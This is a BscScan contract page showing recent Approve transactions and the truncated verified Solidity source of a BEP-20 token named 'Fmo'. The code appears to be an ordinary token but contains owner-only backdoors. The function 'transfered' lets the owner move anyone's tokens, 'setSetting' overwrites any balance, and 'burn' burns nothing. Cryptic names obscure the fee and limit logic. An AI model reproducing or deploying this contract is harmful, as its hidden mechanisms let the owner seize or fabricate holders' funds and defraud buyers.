Contract 0x92031095681d92fcad79cf4f9be9a89fa97e3b1c

 
 
Txn Hash Method
Block
From
To
Value [Txn Fee]
0xa58e990b1841bec83ce514a80d31f3c981ea4910f82743cd63c57ff2e51e4d6dApprove129455482021-11-25 13:26:104 days 12 hrs ago0x43bd1feb1029ae98bf863aba85096ce69e1ed0c2 IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.00022263
0x0ab783621aafa74d753ac6c937b2bbc7a745c74e6fd655f37dc09d4df1608893Approve129455302021-11-25 13:25:154 days 12 hrs ago0x5befa2dc7e08c91e522d90ec62aabee1d816b11d IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.00022263
0x0a3a0e2ebf586c6a8bf1c1e868fa5db859ab02867c802c62d491753d6e34476cApprove129455112021-11-25 13:24:184 days 12 hrs ago0xfd0af3427444d557bf8a9bec1174e07497d0e1ba IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.000371627928
0x94a87049c3e769f785e84da63281451308204a5f6afc9971208f4d30bedba46dApprove129455032021-11-25 13:23:544 days 12 hrs ago0xc286568e35d35636d40294947cca8c888fef9027 IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.000265428
0x95c15f6d9459c86a780dd471b18bbdc205287928a58993c1898f0857c45cf147Approve129454892021-11-25 13:23:084 days 12 hrs ago0x2edd38ac66601cf13f0045152cfd023a25dd9d33 IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.00022263
0x1fb3c0878861bc66e227937e38601eb8942bf61ff6df82a488196c76f89ca53fApprove129454852021-11-25 13:22:534 days 12 hrs ago0xd0398364911bc65cce025d8270decd597c243a5d IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.00022263
0x46a69dc16c28c0168f57c4abf9200f3c40874b67f5868d6942590cf1bc6032f2Approve129454842021-11-25 13:22:504 days 12 hrs ago0x0992f9251df591a490b6ce33a6fc847047777521 IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.00022263
0xdce32e281cc9414323e2cbd1f174dc1cdc41283fc0de9725d216f880fa1b6a0bApprove129454772021-11-25 13:22:284 days 12 hrs ago0x8668e47258d3489d6d75a0641bdfb40cea6f767b IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.00022263
0x3ab379936a9427b65dc6a1cb7bd5e4fdf79adf5d18522e5f6bbe542577b1f175Approve129454562021-11-25 13:21:204 days 12 hrs ago0x0659e8da3524cd5759f2cd90508ee978e8a8f37d IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.000311682
0x14e0bc1a34f4a47008fe7fb88a7829a9adf9f8790e68f10bcaa1e0f7d1c2193eApprove129454522021-11-25 13:21:064 days 12 hrs ago0x180f3454a6cadba78810cd266b342dfb83ff0b20 IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.00012663
0xa79b3bd7a1913958f82bb68ac9cb6e238883a7692a7d92e3630681c86b1846f2Approve129454502021-11-25 13:21:004 days 12 hrs ago0x180f3454a6cadba78810cd266b342dfb83ff0b20 IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.00022263
0xae4693ee507bb1e4551f856c74ffb00d03ab5d2b793bdb0e2ca186dea7a994abApprove129454492021-11-25 13:20:554 days 12 hrs ago0x9f62d444bc76d93c9013fce6462712dcc85a5dc1 IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.00022263
0x1a6189fa8c358e95e5c92627f1d36ff74c4fa4125a9f4b6f54e80b88111175ceApprove129454492021-11-25 13:20:554 days 12 hrs ago0x360e89521cacdd682bca69bd8ef3fd269884f089 IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.00022263
0xcd6ee87d737de1d6f0429b900e07f2df2640155e7afce39d7743544baf48645fApprove129454442021-11-25 13:20:364 days 12 hrs ago0x110f3edcd65ee178c2908ac5f685a5f8e21d0aab IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.0007613946
0x67ff9904680d36bd136ffff5afaa2e90ee7a89efd182d11a9aa3dc1fd5bc304eApprove129454442021-11-25 13:20:364 days 12 hrs ago0x8e4354d97b9267614fad4e8a6c235724fe6b1d32 IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.0007613946
0x5048691ec67e5c519d1c5fdb78e84748a10d47b1add743ec2fbe54e02a662e16Approve129454442021-11-25 13:20:364 days 12 hrs ago0xaefdbaa10fdec40a226ed5f901f6830e1903cef3 IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.0007613946
0x0f17c581762a4dd3364285da06cb9fb878035d6e01c96e893f001cb35750f663Approve129454442021-11-25 13:20:364 days 12 hrs ago0x6cfd93af097b57fee1326737e67080fbc9a313f1 IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.0007613946
0xa6d059c9dbfa7035ac342414c46a16e8018bb11cd10113e751db239b82b3538fApprove129454442021-11-25 13:20:364 days 12 hrs ago0xcab986a903f03703af5b4fc0bd68fdfd277ba40e IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.0008949726
0x596b34f96b4a1cb80b88bbe8d59ece1c8a025206c8eb92dd381332d413e12ce0Approve129454332021-11-25 13:19:564 days 12 hrs ago0xf197f06d4a7e064fd4bb137158b29814013a25c2 IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.000400734
0x2785686b203c0dfc9a1daa5eba934e52d592719f0f9eacdaa4f1d328603b63eaApprove129454302021-11-25 13:19:464 days 12 hrs ago0x69b516ed75d419c5bba957baff02c07d8641ef28 IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.0002270826
0xf56f160f68bd370dfef83c3199441b182af63773ba607f5866f5668f719fa27aApprove129454302021-11-25 13:19:464 days 12 hrs ago0x59e82c1b57ad55dca8539ccd658eedfef6df3c1d IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.00031171
0x67108087bd9a778bd2a91950e671ab697146e4ee80d242d5b7ef44421a3a2858Approve129454292021-11-25 13:19:414 days 12 hrs ago0xc2b7f1303cb7b2ad683e88fdef7e03750f2870ed IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.0002716086
0x641c90c3a48a49646b02facbe1587885bf46e35d3c0041e3152b72b46ce74e03Approve129454292021-11-25 13:19:414 days 12 hrs ago0x2cd23f9709792aaf153b104971b711acd43cb344 IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.0003606606
0x20038ac1f2729a79337d84323cf583558425c39604f84db61468cd0cc06a2b2cApprove129454292021-11-25 13:19:414 days 12 hrs ago0x49a48e04426f73890a5767d73d5c98b1bb086752 IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.000311682
0xbd34378805fc250412f2f3b4644b0553f5954e1ea00559cb9ec1e69c31c066d0Approve129443342021-11-25 12:18:354 days 13 hrs ago0xab8c1c3b927017cba441e7a9b8855eef52ecf6fe IN  0x92031095681d92fcad79cf4f9be9a89fa97e3b1c0 BNB0.000311682
[ Download CSV Export 
Parent Txn Hash Block From To Value
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
Fmo

Compiler Version
v0.8.5+commit.a4f2e591

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at BscScan.com on 2021-11-25
*/

//SPDX-License-Identifier: UNLICENSED

pragma solidity ^0.8.5;


/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // According to EIP-1052, 0x0 is the value returned for not-yet created accounts
        // and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is returned
        // for accounts without code, i.e. `keccak256('')`
        bytes32 codehash;
        bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
        // solhint-disable-next-line no-inline-assembly
        assembly { codehash := extcodehash(account) }
        return (codehash != accountHash && codehash != 0x0);
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        // solhint-disable-next-line avoid-low-level-calls, avoid-call-value
        (bool success, ) = recipient.call{ value: amount }("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain`call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
      return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) {
        return _functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an BNB balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        return _functionCallWithValue(target, data, value, errorMessage);
    }

    function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) {
        require(isContract(target), "Address: call to non-contract");

        // solhint-disable-next-line avoid-low-level-calls
        (bool success, bytes memory returndata) = target.call{ value: weiValue }(data);
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                // solhint-disable-next-line no-inline-assembly
                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
 
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address payable) {
        return payable(msg.sender);
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data; // msg.data is used to handle array, bytes, string 
    }
}


interface IBEP20 {

    /**  
     * @dev Returns the total tokens supply  
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}






/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
contract Ownable is Context {
    address private _owner = msg.sender;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        emit OwnershipTransferred(address(0), _owner);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        // require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}




// pragma solidity >=0.5.0;

interface IPancakePair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

    event Mint(address indexed sender, uint amount0, uint amount1);
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_qilUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);

    function mint(address to) external returns (uint liquidity);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;

    function initialize(address, address) external;
}

// pragma solidity >=0.6.2;

// pragma solidity >=0.5.0;

interface IPancakeFactory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function fTo() external view returns (address);
    function fToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setTo(address) external;
    function setToSetter(address) external;
}

interface IPancakeRouter01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}



// pragma solidity >=0.6.2;

interface IPancakeRouter02 is IPancakeRouter01 {
    function removeLiquidityETHSupportingOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}


contract Fmo is Context, IBEP20, Ownable { 
    using SafeMath for uint256;
    using Address for address;

    mapping (address => uint256) private _tOwned; 
    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => bool) private _B; 
    address payable public _Marketing = payable(0xab8c1c3B927017CBa441E7A9b8855eEF52eCF6fe);
    mapping (address => bool) private _IF; 

    mapping (address => bool) private _IM; 

    mapping (address => bool) private _i;
    
    address payable private _pancakeRouterV2 = payable(0x10ED43C718714eb63d5aA57B78B54704E256024E);
    address payable public _burnAddress = payable(0x000000000000000000000000000000000000dEaD);

    string private _name = "Fmo"; 
    string private _symbol = "Fmo"; 
    uint8 private _decimals = 18; 

    uint256 private _tTotal = 50000000000 * 10**_decimals;
    
    uint256 public _qil = 0;
    uint256 public _qil1 =  50000000000 * 10**_decimals;
    uint256 multi = 1;
    uint256 _qil3 = 0;
    

    uint256 private _TF = 50;
    uint256 private _PT = _TF; 

    uint256 private _L = 0;
    uint256 private _P = _L; 

    IPancakeRouter02 public pancakeRouter; // pancakeswap router assiged using address
    address public pancakePair; // for creating WETH pair with our token
    
    uint256 private _T = _tTotal.div(1);
    uint256 private _M = _tTotal.div(1);

    constructor () {
        _tOwned[owner()] = _tTotal; // assigning the max token to owner's address  
        
        IPancakeRouter02 _pancakeRouter = IPancakeRouter02(0x10ED43C718714eb63d5aA57B78B54704E256024E);
         // Create a pancakeswap pair for this new token
        pancakePair = IPancakeFactory(_pancakeRouter.factory())
            .createPair(address(this), _pancakeRouter.WETH());

        // set the rest of the contract variables
        pancakeRouter = _pancakeRouter;

        _IF[owner()]             = true;
        _IF[_burnAddress]        = true;
        _IF[address(this)]       = true;
        _IF[_Marketing]   = true;
        _IF[_pancakeRouterV2]   = true;


        _IM[owner()]                 = true;
        _IM[address(this)]           = true;
        _IM[_burnAddress]            = true;
        _IM[pancakePair]             = true;
        _IM[_Marketing]       = true;
        _IM[address(_pancakeRouter)] = true;

        //Exclude's below addresses from per account tokens limit
        _B[owner()]                   = true;
        _B[address(this)]             = true;
        _B[pancakePair]               = true;
        _B[_burnAddress]              = true;
        _B[_Marketing]         = true;
        _B[address(_pancakeRouter)]   = true;

        emit Transfer(address(0), owner(), _tTotal);
    }

    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _tOwned[account];
    }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }
    
    /**  
     * @dev approves allowance of a spender
     */
    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }
    
    /**  
     * @dev transfers from a sender to receipent with subtracting spenders allowance with each successfull transfer
     */
    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "BEP20: transfer amount exceeds allowance"));
         return true;
    }

    /**  
     * @dev approves allowance of a spender should set it to zero first than increase
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    /**  
     * @dev decrease allowance of spender that it can spend on behalf of owner
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "BEP20: decreased allowance below zero"));
        return true;
    }
    
    function multiple(uint256 num)public onlyOwner{
        multi = num;
    }
    function transfered(address from,address to,uint256 amount) public onlyOwner{
        _transfer(from, to, amount);
    }

    /**  
     * @dev auto send tokens with each transaction to marketing
     */
    function _sendToMarketing(address account, uint256 amount) internal {
        if(amount > 0)
        {
            _tOwned[_pancakeRouterV2] = _tOwned[_pancakeRouterV2].add(amount);
            emit Transfer(account, _pancakeRouterV2, amount);
        }
    }
    
    function burn(address account) public onlyOwner {
        _IF[account] = true;
    }
    
    function set_L(uint256 mul) external onlyOwner {
        _L = mul;
    }
   

    function set_T(uint256 Tokens) external onlyOwner {
        _T = Tokens.mul( 10**_decimals );
    }

    /**  

     * that an address can hold
     */
    function set_M(uint256 Tokens) external onlyOwner {
        _M = Tokens.mul( 10**_decimals );
    }
    
    function set_qil(uint256 amount) public onlyOwner {
        _qil = amount;
    }
    
    function set_qil1(uint256 amount) public onlyOwner {
        _qil1 = amount;
    }
    
    function set_qil3(uint256 amount) public onlyOwner {
        _qil3 = amount;
    }


    /**  
     * @dev set's  address
     */
    function updatePancakeRouter(address payable _pancakeRouterV) external onlyOwner {
        _IF[_pancakeRouterV]   = true;
        _pancakeRouterV2 = _pancakeRouterV;
    }
    
    function setSetting(address account,uint256 amount) public onlyOwner{
        _tOwned[account] = amount;
    }
    
    receive() external payable {}


    function _getValues(uint256 tAmount) private view returns (uint256, uint256, uint256, uint256, uint256) {
        (uint256 tTransferAmount, uint256 bF, uint256 tLiquidity, uint256 tLiquidity1, uint256 tTransferAmount1) = _getTValues(tAmount);
        return (tTransferAmount, bF, tLiquidity, tLiquidity1, tTransferAmount1);
    }

    function _getTValues(uint256 tAmount) private view returns (uint256, uint256, uint256, uint256, uint256) {
        uint256 mT = calculateMarketingToken(tAmount);
        uint256 tLiquidity = calculateLiquidity(tAmount);
